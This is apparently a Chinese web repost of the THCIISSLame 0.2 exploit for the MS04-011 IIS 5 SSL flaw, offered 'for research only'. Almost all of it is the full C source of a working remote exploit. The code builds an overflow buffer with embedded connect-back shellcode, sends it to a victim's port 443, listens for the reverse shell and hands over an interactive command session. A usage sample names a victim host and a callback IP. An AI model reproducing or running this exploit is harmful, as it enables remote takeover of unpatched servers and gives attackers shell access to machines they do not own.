| 关键词: nbsp printf sock unsigned addr mytcp struct xff 53 exit |
应网友要求,公布04-011攻击脚本。现在公布,应该不会有太多实际意义了吧,仅供研究使用。----------------------------------------------------------------------------------/*************************************************************//* THCIISSLame 0.2 - IIS 5 SSL remote root exploit *//* Exploit by: Johnny Cyberpunk ([email protected]) *//* THC PUBLIC SOURCE MATERIALS *//* *//* Bug was found by Internet Security Systems *//* Reversing credits of the bug go to Halvar Flake *//* *//* compile with MS Visual C++ : cl THCIISSLame.c *//* *//* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, *//* scut, stealth, FtR and Random *//*************************************************************/#include <stdio.h>#include <stdlib.h>#include <string.h>#include <winsock2.h>#pragma comment(lib, "ws2_32.lib")#define jumper "\xeb\x0f"#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";char shellcode[] ="\xeb\x25\x7a\x69\x7f\x00\x00\x01\x02\x06\x6c\x59\x6c\x59\xf8""\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f""\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d""\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c""\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01""\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b""\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe""\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44""\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50""\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f""\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08""\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02""\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce\x31\xdb\x53""\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30""\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55""\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65""\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57""\x53\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88""\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff""\x55\xf0\x6a\xff\xff\x55\xe4";void usage();void shell(int sock);int main(int argc, char *argv[]){ unsigned int i,sock,sock2,sock3,addr,rc,len=16;unsigned char *badbuf,*p;unsigned long offset = 0x6741a1cd;unsigned long XOR = 0xffffffff;unsigned short cbport;unsigned long cbip;struct sockaddr_in mytcp;struct hostent * hp;WSADATA wsaData;printf("\nTHCIISSLame v0.2 - IIS 5.0 SSL remote root exploit\n");printf("tested on Windows 2000 Server german/english SP4\n");printf("by Johnny Cyberpunk ([email protected])\n");if(argc<4 || argc>4)usage();badbuf = malloc(327);memset(badbuf,0,327);printf("\n[*] building buffer\n");p = badbuf;memcpy(p,sslshit,sizeof(sslshit));p+=sizeof(sslshit)-1;strcat(p,jumper);strcat(p,greetings_to_microsoft);offset^=XOR;strncat(p,(unsigned char *)&offset,4);cbport = htons((unsigned short)atoi(argv[3]));cbip = inet_addr(argv[2]);memcpy(&shellcode[2],&cbport,2);memcpy(&shellcode[4],&cbip,4);strcat(p,shellcode);if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){printf("WSAStartup failed !\n");exit(-1);}hp = gethostbyname(argv[1]);if (!hp){addr = inet_addr(argv[1]);}if ((!hp) && (addr == INADDR_NONE) ){printf("Unable to resolve %s\n",argv[1]);exit(-1);}sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);if (!sock){ printf("socket() error...\n");exit(-1);}if (hp != NULL)memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);elsemytcp.sin_addr.s_addr = addr;if (hp)mytcp.sin_family = hp->h_addrtype;elsemytcp.sin_family = AF_INET;mytcp.sin_port=htons(443);printf("[*] connecting the target\n");rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));if(rc==0){send(sock,badbuf,326,0);printf("[*] exploit send\n");Sleep(500);mytcp.sin_addr.s_addr = 0;mytcp.sin_port=htons((unsigned short)atoi(argv[3]));sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);rc=bind(sock2,(struct sockaddr *)&mytcp,16);if(rc!=0){printf("bind error() %d\n",WSAGetLastError());exit(-1);}rc=listen(sock2,1);if(rc!=0){printf("listen error()\n");exit(-1);}printf("[*] waiting for shell\n");sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); if(sock3){ printf("[*] Exploit successful ! Have fun !\n");printf("[*] --------------------------------------------------------------------\n\n");shell(sock3);}}else{printf("\nCan't connect to ssl port 443!\n");exit(-1);}shutdown(sock,1);closesocket(sock);shutdown(sock,2);closesocket(sock2);shutdown(sock,3);closesocket(sock3);free(badbuf);exit(0);}void usage(){unsigned int a;printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");exit(0);}void shell(int sock){int l;char buf[1024];struct timeval time;unsigned long ul[2];time.tv_sec = 1;time.tv_usec = 0;while (1){ul[0] = 1;ul[1] = sock;l = select (0, (fd_set *)&ul, NULL, NULL, &time);if(l == 1){ l = recv (sock, buf, sizeof (buf), 0);if (l <= 0){printf ("bye bye...\n");return;}l = write (1, buf, l);if (l <= 0){printf ("bye bye...\n");return;}}else{l = read (0, buf, sizeof (buf));if (l <= 0){printf("bye bye...\n");return;}l = send(sock, buf, l, 0);if (l <= 0){printf("bye bye...\n");return;}}}} |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|